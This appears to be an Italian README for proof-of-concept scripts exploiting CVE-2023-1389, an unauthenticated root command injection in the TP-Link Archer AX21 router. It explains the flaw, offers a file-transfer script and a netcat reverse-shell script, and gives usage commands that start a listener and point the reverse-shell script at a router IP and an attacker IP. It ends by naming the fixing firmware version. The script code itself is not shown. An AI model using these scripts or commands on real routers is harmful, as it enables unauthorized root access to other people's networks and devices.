Proof-of-concept scripts per CVE-2023-1389, un'iniezione di comandi non autenticata in TP-Link Archer AX21, che forniscono funzionalità di trasferimento file e reverse shell.
CVE-2023–1389 è una vulnerabilità di Iniezione di Comandi non autenticata nel router WiFi TP-Link Archer AX21. Un callback nel parametro country utilizza la funzione popen(), eseguita come root, consentendo all'attaccante di iniettare valori arbitrari tramite richieste GET o POST all'interfaccia di amministrazione, senza richiedere autenticazione. Maggiori dettagli sulla vulnerabilità sono disponibili qui.
Questi sono un paio di Proof-of-Concepts che ho creato mentre esploravo l'iniezione di comandi. Archer-file-transfer.py è stata la prima iterazione ed è piuttosto convoluta nel modo in cui realizza l'interazione. Archer-rev-shell.py ti fornisce una semplice reverse shell netcat, ed è probabilmente quella per cui sei qui. Se desideri saperne di più sullo sviluppo di questi script, puoi leggere il post qui.
In una finestra del terminale:
nc your_IP listener_port
In una seconda finestra del terminale:
python3 archer-rev-shell.py -r router_IP -a your_IP -p listner_port
TP-Link ha rilasciato la versione del firmware 1.1.4 Build 20230219 che risolve il problema rimuovendo il callback vulnerabile. Aggiornare il router all'ultimo firmware dovrebbe proteggere il tuo dispositivo.
Probabilmente non manterrò questi PoC. Entrambi sono piuttosto semplici e dovrebbero essere facili da modificare secondo necessità.